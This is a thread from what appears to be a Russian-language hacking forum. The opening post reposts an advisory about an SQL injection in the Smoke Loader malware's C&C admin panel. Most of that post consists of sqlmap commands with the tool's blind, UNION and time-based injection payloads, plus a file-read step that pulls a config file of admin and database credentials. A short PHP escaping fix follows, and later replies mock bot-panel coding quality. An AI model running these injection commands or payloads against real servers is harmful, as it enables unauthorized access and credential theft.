• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Smoke Loader SQL Injection Vulnerability

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
Like other http-based exploit kits, I've discovered that the smoke loader malware downloader has a sql injection in its C&C administration panel that can be used to revel the administrator's password.

sqlmap can identify the vulnerable parameter with the string:

root@localhoost:/opt/pentest/database/sqlmap# ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3
--risk 3


sqlmap identified the following injection points with a total of 278
HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
RLIKE IF(2984=2984,0x4d7953514c,0x28)

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a71616c3a,0x467173496b71686b617a,0x3a7269703a),NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
AND SLEEP(5)

Then:

root@localhoost:/opt/pentest/database/sqlmap# ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk
3 --file-read=[smoke root directory--can be found by sql errors on guest panel
by replacing the above parameters with invalid data]/admin/inc/cfg.php


root@localhoost:/opt/pentest/database/sqlmap# cat output/localhost/files/_var_www_smoke_admin_inc_cfg.php
<?php

$config["admin"] = "bla"; //admin login name
$config["pass"] = "blabla"; //admin password

$config["guest"] = "guest"; //admin login name
$config["gpass"] = "guest"; //admin password

$config["dbhost"] = "localhost";
$config["dbname"] = "smoke"; //mysql database name
$config["dbuser"] = "bla"; //mysql database username
$config["dbpass"] = "meh"; //mysql databse password

$config["interval"] = 600; //interval for check online bots

$OS = array
(
0 => "Windows XP",
1 => "Windows 2003",
2 => "Windows Vista",
3 => "Windows 7",
4 => "Other"
);

?>

# 1337day.com [2012-12-24]
 
Нашел на одном из американских форумов :)

For all who want to fix this vulnerability, edit the allgexe function in the /inc/funcs.php like so:

PHP Code:
function allgexe($id)
{
$id = mysql_real_escape_string($id);
$r = mysql_query("SELECT * FROM sellers WHERE id=$id");
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да эта админка дырявая, как решето. Ни в ддос боте, ни в лоадере не было абсолютно никакой фильтрации параметров, пиши в базу что хочешь, хоть яваскрипт, хоть что. Вот Krazz любит писать про ошибки малваре кодеров, но если взять админки ботов, то там вообще п..ц. За все время я видел всего две годные - Зевс и Андромеда, иное все кривой и дырявый шлак. Или все экономят на вебкодерах, или илите так сложно добавить вызов какой-нибудь strip_tags и escape_string, хз.
 
Да эта админка дырявая, как решето. Ни в ддос боте, ни в лоадере не было абсолютно никакой фильтрации параметров, пиши в базу что хочешь, хоть яваскрипт, хоть что. Вот Krazz любит писать про ошибки малваре кодеров, но если взять админки ботов, то там вообще п..ц. За все время я видел всего две годные - Зевс и Андромеда, иное все кривой и дырявый шлак. Или все экономят на вебкодерах, или илите так сложно добавить вызов какой-нибудь strip_tags и escape_string, хз.

В каком ты смысле согласен....), то есть виной всиму лень)))
------------
ЗЫ: Что мезаешт заказать анализ кода у нормальных кодеров на выявление уязвимостей, а так же предложить людям с тепичными навыками посматреть панель из "далека", за выявление дыр платить деньгу....)) На мой взгляд самый адыкватный вариант решения этой проблемы.
-------------------------------------------------------------------------------
ЗЫЫ,ОФФ_: Для таких желающих, пишите, я подскажу куда обратиться за подобными услугами :baby:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх